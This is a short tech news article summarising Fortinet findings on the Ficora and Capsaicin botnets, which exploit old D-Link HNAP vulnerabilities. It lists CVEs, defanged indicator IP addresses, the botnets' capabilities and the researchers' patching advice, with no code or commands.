Skip to content

Ficora and Capsaicin botnet exploit decade-old D-Link flaws

  • by
  • 3 min read

Photo: WhataWin/Shutterstock.com

There has been a significant uptick in the activity of two distinct botnets — the Mirai variant ‘Ficora’ and the Kaiten variant ‘Capsaicin’ — over October and November 2024. Both botnets leverage long-documented vulnerabilities in D-Link devices, which allow attackers to execute malicious commands via the Home Network Administration Protocol (HNAP) interface.

This exploitation underscores the enduring risks of unpatched vulnerabilities, some dating back nearly a decade.

The HNAP weakness has been a known threat vector for years, linked to vulnerabilities catalogued under CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and CVE-2024-33112. Despite the availability of patches, the contained prevalence of these attacks highlights a broader issue of neglected firmware updates and device maintenance.

The ‘Ficora’ botnet has exhibited widespread activity, with attackers originating from servers in the Netherlands, specifically, IP addresses 185[.]191[.]126[.]213 and 185[.]191[.]126[.]248. Unlike targeted campaigns, ‘FICORA’ is a global threat, indiscriminately infecting devices across multiple regions.

FICORA telemetry. | Source: Fortinet

The botnet employs a sophisticated downloader shell script named ‘multi’ to propagate its malware. This script utilises various tools — ‘wget,’ ‘ftpget,’ ‘curl,’ and ‘tftp’ — to download and execute the malware across a range of Linux architectures, including ARM, MIPS, PowerPC, and SPARC, among others.

‘Ficora’ encrypts its configuration using the ChaCha20 algorithm, encompassing its command-and-control (C2) server domain and a unique identifier. It also integrates brute force attack functionality with hard-coded username and password lists.

To assert dominance over infected systems, the malware terminates processes associated with other malware, such as those containing the keyword ‘dvrHelper.’ Additionally, ‘Ficora’ retains the hallmark of Mirai-based malware by executing distributed denial-of-service (DDoS) attacks using protocols like UDP, TCP, and DNS.

Researchers discovered that, unlike Ficora, the Capsaicin botnet showcased an intense but brief surge in activity on October 21 and 22, 2024. This botnet predominantly targeted East Asian countries. Delivered via a shell script named ‘bins.sh,’ the botnet propagates using a similar array of Linux architectures as Ficora.

CAPSAICIN telemetry. | Source: Fortinet

Upon execution, the malware’s name appears in a pop-up string, reinforcing its identity. ‘Capsaicin’ establishes a connection with its C2 server at 192[.]110[.]247[.]46, transmitting host operating system information and a designated nickname. Commands from the server enable diverse functionalities, including executing DDoS attacks and terminating rival botnets.

Analysis indicates that ‘Capsaicin’ stems from botnet versions attributed to the Keksec group, specifically version 17.0.0. Including help messages within the malware to assist attackers in parameter usage reflects its design sophistication.

Researchers have urged organisations to regularly update device firmware and kernels, implement robust intrusion prevention systems (IPS) to detect and block malicious traffic, and conduct comprehensive network activity monitoring.

In the News: Major ChatGPT outage affects services, recovery initiated

Kumar Hemant

Kumar Hemant

Deputy Editor at Candid.Technology. Hemant writes at the intersection of tech and culture and has a keen interest in science, social issues and international relations. You can contact him here: kumarhemant@pm.me

>